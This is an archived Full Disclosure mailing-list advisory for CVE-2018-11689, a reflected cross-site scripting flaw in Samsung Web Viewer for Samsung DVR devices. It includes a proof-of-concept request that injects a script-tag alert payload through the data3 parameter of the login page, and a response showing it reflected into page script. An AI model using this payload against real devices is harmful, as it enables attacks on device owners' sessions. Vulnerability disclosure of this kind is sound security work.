[<prev] [next>] [day] [month] [year] [list]
Message-ID: <CALQO-TTWBxkdAuMZXD9ndkjFd6nLDp2w1fYjvANcg3OWE-YfEA@mail.gmail.com>
Date: Wed, 13 Jun 2018 12:42:35 +0300
From: yavuz atlas <yavatlas@...il.com>
To: bugtraq@...urityfocus.com, fulldisclosure@...lists.org,
bugs@...uritytracker.com
Subject: [FD] Samsung Web Viewer for Samsung DVR Reflected Cross Site
Scripting (XSS) CVE-2018-11689
I. VULNERABILITY
-------------------------
Samsung Web Viewer for Samsung DVR Reflected Cross Site Scripting (XSS)
II. CVE REFERENCE
-------------------------
CVE-2018-11689
III. REFERENCES
-------------------------
https://vulmon.com/vulnerabilitydetails?qid=CVE-2018-11689
IV. CREDIT
-------------------------
Yavuz Atlas - Biznet Bilisim
http://www.biznet.com.tr/biznet-guvenlik-duyurulari
V. DESCRIPTION
-------------------------
Samsung Web Viewer for Samsung DVR devices (Samsung Smart Viewer) is
vulnerable to cross-site scripting. The vulnerability allows remote
attackers to inject arbitrary web script or HTML.
VI. PROOF OF CONCEPT
-------------------------
Request:
GET /cgi-bin/webviewer_login_page?lang=tu&loginvalue=0&port=0&data3=</script><script>alert(1)</script>
HTTP/1.1
Host: 10.10.10.10
Response:
HTTP/1.1 200 OK
X-UA-Compatible: IE=EmulateIE9, requiresActiveX=true
Content-type: text/html
Connection: close
Date: Wed, 23 May 2018 11:14:09 GMT
Server: lighttpd/1.4.35
Content-Length: 10797
…
function setcookie(){
var val_rand = Math.random();
if(is_close_user_session == true)
document.login_page_submit.close_user_session.value = 1;
else
document.login_page_submit.close_user_session.value = 0;
document.login_page_submit.data1.value =
data_parser(document.login_page.data1.value);
document.login_page_submit.data2.value =
do_encrypt(document.login_page.data2.value);
document.login_page_submit.data3.value = </script><script>alert(1)</script>;
document.login_page_submit.data4.value = val_rand;
document.login_page_submit.submit();
}
…
_______________________________________________
Sent through the Full Disclosure mailing list
https://nmap.org/mailman/listinfo/fulldisclosure
Web Archives & RSS: http://seclists.org/fulldisclosure/
Powered by blists - more mailing lists